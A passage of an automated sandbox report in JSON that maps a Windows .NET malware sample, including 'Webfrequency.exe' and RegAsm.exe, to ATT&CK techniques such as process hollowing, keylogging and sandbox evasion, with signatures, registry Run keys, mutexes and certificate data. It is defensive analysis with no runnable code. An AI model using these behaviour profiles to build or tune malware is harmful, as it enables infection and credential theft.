Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Microsoft\\.NETFramework\\AppContext\" in Source: 00000000-00001812.00000000.186728.01C70000.00000004.mdmp\n \"System\\CurrentControlSet\\Control\\Nls\\RegionMapping\" in Source: 00000000-00001812.00000000.186728.01C70000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\.NETFramework\\AppContext\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"System\\CurrentControlSet\\Control\\Nls\\RegionMapping\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"Software\\Microsoft\\.NETFramework\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\.NETFramework\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00002568.00000001.186418.04240000.00000004.mdmp\n \"Registry\\Machine\\System\\CurrentControlSet\\Control\\Keyboard Layout\" in Source: 00000000-00004536.00000000.195096.7F6F0000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00001812.00000001.188519.02C70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"_CreateProcess\" (Indicator: \"CreateProcess\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"CreateProcessFlags\" (Indicator: \"CreateProcess\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63CF0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63540000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 644A0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63090000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75690000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75690000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75690000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\275f33b5-6128-4f44-8a52-0fbb07a22200\"\n \"\\Sessions\\1\\BaseNamedObjects\\eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2092356043-4041700817-663127204-1001\"\n \"275f33b5-6128-4f44-8a52-0fbb07a22200\"\n \"eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2092356043-4041700817-663127204-1001\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 05:63:B8:63:0D:62:D7:5A:BB:C8:AB:1E:4B:DF:B5:A8:99:B2:4D:43; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 92:C1:58:8E:85:AF:22:01:CE:79:15:E8:53:8B:49:2F:60:5B:80:C6; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: B6:B2:4A:EA:9E:98:3E:D6:BD:A9:58:6A:14:5A:7D:DD:7E:22:01:96; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Symantec Time Stamping Services CA - G2, O=Symantec Corporation, C=US\" (SHA1: 65:43:99:29:B6:79:73:EB:19:2D:6F:F2:43:E6:76:7A:DF:08:34:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Thawte Timestamping CA, OU=Thawte Certification, O=Thawte, L=Durbanville, ST=Western Cape, C=ZA\" (SHA1: 6C:07:45:3F:FD:DA:08:B8:37:07:C0:9B:82:FB:3D:15:F3:53:36:B1; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Webfrequency.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"Webfrequency.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"Webfrequency.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00002568-00000C2B-285870172]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00002568-00000C28-1905512358]\n Observed system executable 